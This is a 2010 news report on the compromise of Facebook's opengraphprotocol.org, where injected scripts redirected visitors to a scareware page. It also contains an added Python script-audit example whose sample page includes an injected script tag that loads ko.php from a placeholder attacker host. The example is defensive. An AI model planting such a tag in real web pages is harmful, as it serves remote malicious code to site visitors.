Oct 26, 2010 11:32 GMT  ·  By

A website operated by Facebook to provide information about the Open Graph protocol has been compromised and its pages injected with malicious scripts.

Facebook invented the Open Graph protocol in order to allow developers to create pages that have the same functionality as Facebook ones.

The infection on the opengraphprotocol.org website was discovered by security researchers from Web and email security vendor Websense, who note that all of its pages were affected.

The attackers managed to inject a <script> element, which loads a file called ko.php from a remote server, right before the end of the body tag.

This rogue script triggers a series of redirects that eventually land visitors on a scareware distribution page displaying a fake antivirus scan.

Scareware, or rogueware, are terms for applications that pose as antivirus software and attempt to scare users into paying for license keys.

They try to achieve this by displaying bogus security alerts about infections allegedly found on the user's computer and claiming that additional paid-only components are required for proper removal.

To use the Open Graph protocol, developers have to define special meta properties for their pages and declare a special XML namespace (xmlns) of og="http://opengraphprotocol.org/schema/".

But even though every page on opengraphprotocol.org was infected, this does not mean that websites using the protocol have also been affected.

"It's very important to note that Web sites that use the Open Graph API [...], will NOT serve malicious content to their users," the Websense researchers stress.

"This is because the schema link is an informational link only, it doesn't get loaded as part of the page, nor does it provide a clickable link to the user," they explain.
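To make the distinction concrete, here is an added Python example (not the article's or Websense's code) that lists the scripts a page actually fetches and keeps them apart from xmlns declarations, which a browser never requests; the page markup and the attacker.example host are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page (not the real opengraphprotocol.org markup): the og
# namespace declaration described in the article plus an injected remote
# script before </body>. "attacker.example" is a placeholder host.
SAMPLE_PAGE = """<html xmlns="http://www.w3.org/1999/xhtml"
      xmlns:og="http://opengraphprotocol.org/schema/">
<head>
  <meta property="og:title" content="Open Graph protocol"/>
  <script src="/js/site.js"></script>
</head>
<body>
  <p>Documentation</p>
  <script src="http://attacker.example/ko.php"></script>
</body></html>"""


class ScriptAudit(HTMLParser):
    """Records every external script the browser would fetch, and every
    xmlns declaration, which a browser never requests."""

    def __init__(self):
        super().__init__()
        self.script_srcs = []
        self.namespaces = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script" and attrs.get("src"):
            self.script_srcs.append(attrs["src"])
        for name, value in attrs.items():
            if name.startswith("xmlns"):
                self.namespaces.append(value)


def audit_scripts(html, site_host):
    """Return (scripts loaded from hosts other than site_host, xmlns values)."""
    parser = ScriptAudit()
    parser.feed(html)
    foreign = [s for s in parser.script_srcs
               if urlparse(s).hostname not in (None, site_host)]
    return foreign, parser.namespaces


if __name__ == "__main__":
    foreign, ns = audit_scripts(SAMPLE_PAGE, "opengraphprotocol.org")
    print("Third-party scripts to investigate:", foreign)
    print("Namespace declarations (informational only):", ns)
```

Running the audit over a site's own pages after a compromise report surfaces exactly the kind of off-site script element described above, while the og namespace URL never appears among fetched resources.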

The Facebook security team was alerted and cleaned the website in record time. However, the incident shows that even experienced Web coders, like the ones employed by Facebook, can sometimes make mistakes and leave security holes open.